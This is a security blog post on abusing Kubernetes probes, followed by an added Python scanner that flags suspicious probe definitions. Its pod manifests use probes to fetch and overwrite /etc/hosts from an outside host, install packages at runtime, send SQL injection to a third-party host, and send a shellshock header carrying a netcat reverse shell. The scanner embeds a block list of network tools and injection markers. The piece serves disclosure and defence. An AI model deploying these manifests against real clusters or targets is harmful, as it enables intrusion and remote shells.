Exploiting applications using liveness probes in Kubernetes

Philippe Bogaerts
2 min read · Feb 7, 2022

Introduction

Startup, readiness, and liveness probes are very well described in the Kubernetes documentation. The kubelet uses the probes defined in the pod manifest to verify whether a pod is booting, ready to accept traffic, and still alive. It is the kubelet that actually executes the probes (and not the pod itself).

There are different ways the probes are executed.

  • httpGet
  • exec

The problems described here are considered ‘as designed’ by the reviewers, since you are expected to download container images only from a trusted source.

The examples below show that trusted sources of container images will not solve the problem, and neither will image scanning.

To prevent such an attack, it is mandatory to scan the Kubernetes pod and deployment manifests rigorously before deploying (and not to use any pre-canned examples :-))

Example 1: Overwriting files on the pod filesystem

This example overwrites the pod's /etc/hosts file to spoof hostnames.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec15
spec:
  containers:
  - name: liveness
    image: xxradar/hackon
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      exec:
        command:
        - curl
        - www.xxxxx.com/host.txt
        - -o
        - /etc/hosts
      initialDelaySeconds: 5
      periodSeconds: 5
EOF

Example 2: Installing applications in a pod at deployment time

Here the readiness probe runs apt-get update and the liveness probe then installs curl, so the running container is modified from package sources at runtime without any of it being visible in the image.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec39
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    readinessProbe:
      exec:
        command:
        - apt-get
        - update
      initialDelaySeconds: 5
      periodSeconds: 10
      timeoutSeconds: 60
    livenessProbe:
      exec:
        command:
        - apt-get
        - install
        - -y
        - curl
      initialDelaySeconds: 60
      periodSeconds: 100
      timeoutSeconds: 60
EOF

Example 3: Attacking http(s) endpoints using SQL injection, XSS, …

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness3
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      httpGet:
        host: www.xxxx.com
        path: /?'OR 1=1--
        port: 8080
        httpHeaders:
        - name: User-Agent
          value: xxxxxxxxx
EOF

Example 4: Attacking http(s) endpoints using shellshock

apiVersion: v1
kind: Pod
metadata:
  name: radarhack-pod3
  labels:
    pod: radarhack
spec:
  containers:
  - name: radarhack
    image: docker.io/xxradar/naxsi5
    ports:
    - containerPort: 80
    livenessProbe:
      httpGet:
        host: www.xxxxx.com
        path: /index.html?test=' or 1=1--
        port: 8080
        httpHeaders:
        - name: Custom-Header
          value: Awesome
        - name: X-Frame-Options
          value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
      initialDelaySeconds: 3
      periodSeconds: 3
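The introduction says the only real defence is to scan pod and deployment manifests rigorously before deploying. The following script is an added example of such a check, written for this page and not taken from the post or any project: it walks the probes of every container (and init container) in a Pod, or in the pod template of a Deployment/DaemonSet/StatefulSet/Job, and flags the patterns the four examples above rely on. Exec probes that call network or package-manager binaries or pass a URL (Examples 1 and 2), httpGet probes whose `host` is set so the kubelet probes something other than the pod (Examples 3 and 4), and paths or header values that carry injection characters (Examples 3 and 4) all produce findings. The binary list, the marker list, the function names and the sample manifests are all our own assumptions; the manifests are embedded as Python dicts (the YAML equivalent) so that no YAML library is needed, and `www.xxxxx.com` is simply the post's own placeholder host.

```python
import os
from typing import Any, Dict, List

# Binaries that have no place in a health check: they reach the network or modify the image.
SUSPICIOUS_EXEC_BINARIES = {
    "curl", "wget", "nc", "ncat", "netcat",
    "apt", "apt-get", "apk", "yum", "dnf", "pip", "pip3",
}
# Sequences typical of SQL injection, shell metacharacters and the shellshock prefix.
INJECTION_MARKERS = ("'", '"', "--", ";", "() {", "|", "`", "$(")
PROBE_KINDS = ("startupProbe", "readinessProbe", "livenessProbe")


def _pod_spec(manifest: Dict[str, Any]) -> Dict[str, Any]:
    """Return the pod spec of a Pod, or of any workload that wraps a pod template."""
    spec = manifest.get("spec", {})
    if manifest.get("kind") == "Pod":
        return spec
    return spec.get("template", {}).get("spec", {})


def check_probe(container: str, kind: str, probe: Dict[str, Any]) -> List[str]:
    """Return one finding per suspicious property of a single probe definition."""
    findings: List[str] = []
    where = f"{container}.{kind}"

    exec_probe = probe.get("exec")
    if exec_probe:
        command = [str(part) for part in exec_probe.get("command", [])]
        binary = os.path.basename(command[0]) if command else ""
        if binary in SUSPICIOUS_EXEC_BINARIES:
            findings.append(f"{where}: exec probe runs '{binary}', a network/package tool")
        # A URL-looking argument means the probe reaches outside the pod.
        if any("://" in arg or arg.startswith("www.") for arg in command[1:]):
            findings.append(f"{where}: exec probe command contains a URL")

    http_probe = probe.get("httpGet")
    if http_probe:
        host = http_probe.get("host")
        if host:
            # The kubelet defaults host to the pod IP; an explicit host redirects the probe elsewhere.
            findings.append(f"{where}: httpGet host is set to '{host}' instead of the pod")
        path = str(http_probe.get("path", ""))
        if any(marker in path for marker in INJECTION_MARKERS):
            findings.append(f"{where}: httpGet path '{path}' contains injection characters")
        for header in http_probe.get("httpHeaders", []):
            if any(marker in str(header.get("value", "")) for marker in INJECTION_MARKERS):
                findings.append(f"{where}: httpGet header '{header.get('name')}' carries a payload-like value")
    return findings


def scan_manifest(manifest: Dict[str, Any]) -> List[str]:
    """Collect findings for every probe of every container and init container."""
    spec = _pod_spec(manifest)
    findings: List[str] = []
    for container in spec.get("containers", []) + spec.get("initContainers", []):
        for kind in PROBE_KINDS:
            if kind in container:
                findings.extend(check_probe(container.get("name", "?"), kind, container[kind]))
    return findings


# Constructed sample manifests as Python dicts (the YAML equivalent needs no extra library).
# A well-behaved pod: the probes only look at the container itself.
BENIGN_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "app"}, "spec": {"containers": [{
    "name": "app", "image": "registry.example/app:1.0",
    "livenessProbe": {"exec": {"command": ["cat", "/tmp/healthy"]}, "periodSeconds": 5},
    "readinessProbe": {"httpGet": {"path": "/healthz", "port": 8080,
                                   "httpHeaders": [{"name": "Accept", "value": "application/json"}]}},
}]}}
# Shape of the post's Example 1: the probe fetches a file from the internet into the pod.
FETCHING_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "fetch"}, "spec": {"containers": [{
    "name": "fetch", "image": "registry.example/app:1.0",
    "livenessProbe": {"exec": {"command": ["curl", "www.xxxxx.com/host.txt", "-o", "/etc/hosts"]}},
}]}}
# Shape of the post's Examples 3 and 4: the kubelet is pointed at a third party with a payload.
INJECTING_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "inject"}, "spec": {"containers": [{
    "name": "inject", "image": "registry.example/app:1.0",
    "livenessProbe": {"httpGet": {"host": "www.xxxxx.com", "path": "/index.html?test=' or 1=1--", "port": 8080,
                                  "httpHeaders": [{"name": "X-Frame-Options", "value": "() { :;}; echo"}]}},
}]}}

if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN_POD), ("fetching", FETCHING_POD), ("injecting", INJECTING_POD)):
        print(label, scan_manifest(manifest) or ["no findings"])
```

The checks are deliberately heuristic: a legitimate path could contain `--`, and a probe may call a binary not in the list, so in practice the binary check is better inverted into an allowlist of the few commands a health check is permitted to run (the same logic fits a CI step over rendered manifests or a validating admission webhook). The benign manifest shows what the corrected form of the examples above looks like: an exec probe that reads a file the container wrote itself, and an httpGet probe with no `host`, a plain path, and plain header values.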

Conclusion

Much has been written about securely deploying applications on Kubernetes. Keep in mind that every aspect needs full attention, and that generating and building Kubernetes manifests is also developing code.

Philippe Bogaerts

#BruCON co-founder, #OWASP supporter, Application Delivery and Web Application Security, #Kubernetes and #container, #pentesting enthusiast, BBQ & cocktails !!